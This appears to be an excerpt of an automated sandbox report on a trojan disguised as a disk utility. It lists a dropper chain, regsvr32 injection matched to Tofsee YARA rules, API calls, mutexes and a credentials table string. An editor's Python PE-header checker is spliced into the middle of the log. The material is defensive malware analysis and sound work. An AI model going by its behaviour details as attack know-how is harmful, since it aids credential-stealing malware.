                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02D9874A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02D9BF15
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02DA0DB4
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 10_2_00565DEE
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 10_2_00564BE1
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 10_2_0277C913
                    Source: Joe Sandbox View, Dropped File: C:\ProgramData\NTFS2FAT32Converter\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00405964 appears 116 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00408C14 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00406ACC appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00403400 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00445DE4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 004078FC appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 004344EC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00403494 appears 82 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00457D58 appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00453330 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00457B4C appears 98 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 00403684 appears 221 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: String function: 004460B4 appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Code function: String function: 10003170 appears 34 times
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: String function: 02D97760 appears 32 times
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: String function: 02DA2A10 appears 135 times
                    Source: DrjfIAN86u.exe.1.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: Qv4wdsLMG.exe.1.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: UNIQTWO[1].file.1.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: UNIQTHREE[1].file.1.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: DrjfIAN86u.tmp.3.dr, Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: DrjfIAN86u.tmp.3.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Source: DrjfIAN86u.tmp.3.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: DrjfIAN86u.tmp.3.dr, Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-AJ5Q5.tmp.4.dr, Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-AJ5Q5.tmp.4.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Source: is-AJ5Q5.tmp.4.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-AJ5Q5.tmp.4.dr, Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: Qv4wdsLMG.tmp.6.dr, Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: Qv4wdsLMG.tmp.6.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: Qv4wdsLMG.tmp.8.dr, Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: Qv4wdsLMG.tmp.8.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-LIN1F.tmp.9.dr, Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-LIN1F.tmp.9.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: sqlite3.dll.5.dr, Static PE information: Number of sections : 19 > 10
                    Source: is-RFHNE.tmp.4.dr, Static PE information: Number of sections : 19 > 10
                    Source: is-4R09J.tmp.9.dr, Static PE information: Number of sections : 22 > 10
                    Source: nK8noQeiXl.exe, Binary or memory string: OriginalFilename vs nK8noQeiXl.exe
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameWINHEX.EXE0 vs nK8noQeiXl.exe
                    Source: nK8noQeiXl.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 10.2.regsvr32.exe.2859196.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 10.2.regsvr32.exe.2859196.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
                    Source: 10.2.regsvr32.exe.5512e6.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 10.2.regsvr32.exe.5512e6.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
                    Source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
                    Source: 0000000A.00000002.2572481446.0000000002771000.00000020.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: ntfs2fat32converter102.exe.4.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: _RegDLL.tmp.4.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: NTFS2FAT32Converter.exe.5.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
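                    The static PE heuristics listed above (the section count above 10, the IMAGE_FILE_HEADER characteristics reported for nK8noQeiXl.exe, and the IMAGE_SCN_* flags of the dropped .text sections) can be reproduced without a sandbox. The block below is an example added by the editor; it is not Joe Sandbox code and not taken from any of the samples in this report. It walks the DOS header, PE signature, COFF header and section table of a PE32/PE32+ image with nothing but the standard library, decodes the flag bits, and emits findings phrased like the report's "Static PE information" lines. The image it inspects is constructed in memory: a hypothetical packer-style layout with a writable, executable, raw-size-zero section named UPX0 followed by 18 filler sections (19 in total). The UPX0 name, the filler layout and the 0x818E characteristics value used in the test are assumptions for illustration.

```python
"""Static PE checks of the kind a sandbox reports: section count, IMAGE_FILE_HEADER
characteristics and IMAGE_SCN_* section flags. Editor's example code, not Joe Sandbox's;
the PE image it inspects is constructed inline, not a real sample."""
import struct

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h)
FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
    0x8000: "BYTES_REVERSED_HI",
}
# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
SECTION_CHARACTERISTICS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
SECTION_LIMIT = 10  # threshold behind "Number of sections : N > 10"


def flag_names(value, table):
    """Decode a bitmask into the names of the bits set in it, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data):
    """Walk DOS header -> PE signature -> COFF header -> section table (PE32 and PE32+)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _ts, _sym, _nsym, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    sect_off = coff + 20 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsections):
        off = sect_off + i * 40              # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, rawsize, rawptr, _rel, _lin, _nrel, _nlin, sc = struct.unpack_from("<IIIIIIHHI", data, off + 8)
        sections.append({"name": name, "virtual_size": vsize, "virtual_address": va,
                         "raw_size": rawsize, "raw_ptr": rawptr,
                         "flags": flag_names(sc, SECTION_CHARACTERISTICS)})
    return {"machine": machine, "file_characteristics": flag_names(chars, FILE_CHARACTERISTICS),
            "sections": sections}


def triage(data):
    """Return findings phrased like the report's 'Static PE information' lines."""
    pe = parse_pe(data)
    findings = []
    n = len(pe["sections"])
    if n > SECTION_LIMIT:
        findings.append(f"Number of sections : {n} > {SECTION_LIMIT}")
    if {"BYTES_REVERSED_LO", "BYTES_REVERSED_HI"} <= set(pe["file_characteristics"]):
        # deprecated flags that current Microsoft linkers do not set; commonly seen on Borland/Delphi-linked images
        findings.append("BYTES_REVERSED_LO/HI set (legacy linker fingerprint)")
    for s in pe["sections"]:
        f = set(s["flags"])
        if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= f:
            findings.append(f"Section {s['name']} is writable and executable")
        if s["raw_size"] == 0 and s["virtual_size"] > 0 and "IMAGE_SCN_MEM_EXECUTE" in f:
            findings.append(f"Section {s['name']} has no raw data but is executable (filled at runtime, packer-like)")
    return findings


def build_sample_pe(section_specs, file_chars=0x0102):
    """Constructed test input: a minimal PE32 image with the given (name, vsize, rawsize, flags) sections."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)     # e_lfanew: PE signature right after the DOS header
    opt = bytearray(0xE0)                     # PE32 optional header, zeroed except the magic
    struct.pack_into("<H", opt, 0, 0x10B)
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, len(opt), file_chars)
    table = bytearray()
    va, raw = 0x1000, 0x400
    for name, vsize, rsize, flags in section_specs:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, rsize, raw if rsize else 0, 0, 0, 0, 0, flags)
        va += (vsize + 0xFFF) & ~0xFFF        # next section starts on the next page
        raw += rsize
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)


def demo():
    """Hypothetical packed layout: one RWX section with no raw data plus 18 filler sections (19 total)."""
    specs = [("UPX0", 0x10000, 0, 0xE0000080)]                           # UNINIT_DATA|EXECUTE|READ|WRITE
    specs += [(f".s{i}", 0x200, 0x200, 0x40000040) for i in range(18)]  # INITIALIZED_DATA|READ
    return triage(build_sample_pe(specs))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

                    On a real file, call triage(open(path, "rb").read()). Two caveats apply when reading the report's hits through this lens: a section count above 10 is normal for GCC/MinGW-built DLLs that keep .debug_* sections, so the sqlite3.dll hit above is weak evidence on its own; and the BYTES_REVERSED_LO/HI pair in nK8noQeiXl.exe is a toolchain fingerprint rather than a malice indicator, consistent with the Borland\Delphi\Locales registry reads recorded further down in this section.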
                    Source: classification engine, Classification label: mal100.phis.troj.spyw.evad.winEXE@32/70@6/8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02D8F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe, Code function: 3_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_004016F7 CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Code function: 1_2_10001183 __EH_prolog3_GS,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe, Code function: 3_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_00401933 StartServiceCtrlDispatcherA
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 10_2_02779A6B SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlen,ExitProcess,GetTempPathA,lstrcpy,lstrcat,lstrcat,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpy,lstrlen,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,lstrcat,lstrcat,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlen,StartServiceCtrlDispatcherA,GetLastError,Sleep,CreateThread,WSAStartup,CreateThread,Sleep
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\success[1].htm
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Mutant created: \Sessions\1\BaseNamedObjects\HomelyCoat
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9080:120:WilError_03
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe, File created: C:\Users\user\AppData\Local\Temp\svchost015.exe
                    Source: Yara match, File source: 1.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, File read: C:\Windows\win.ini
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: ntfs2fat32converter102.exe, ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: ntfs2fat32converter102.exe, ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1988881080.00000000039E5000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1989153702.000000000391A000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008095748.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2006615082.000000000397B000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991453997.0000000003919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: ntfs2fat32converter102.exe, ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: nK8noQeiXl.exe | Virustotal: Detection: 38%
                    Source: nK8noQeiXl.exe | ReversingLabs: Detection: 55%
                    Source: nK8noQeiXl.exe | String found in binary or memory: If you think that might be the case, please hold the Shift key when interpreting/adding the image again.
                    Source: nK8noQeiXl.exe | String found in binary or memory: remember that you can easily specify the sector size to assume for an image (hold the Shift key while interpreting/adding it).
                    Source: nK8noQeiXl.exe | String found in binary or memory: You can try holding the Shift key when interpreting the image/adding it to the case.
                    Source: nK8noQeiXl.exe | String found in binary or memory: 80ADC/ADD/AND/CMP/OR/SBB/SUB/XOR
                    Source: nK8noQeiXl.exe | String found in binary or memory: 81ADC/ADD/AND/CMP/OR/SBB/SUB/XOR
                    Source: nK8noQeiXl.exe | String found in binary or memory: 83ADC/ADD/AND/CMP/OR/SBB/SUB/XOR
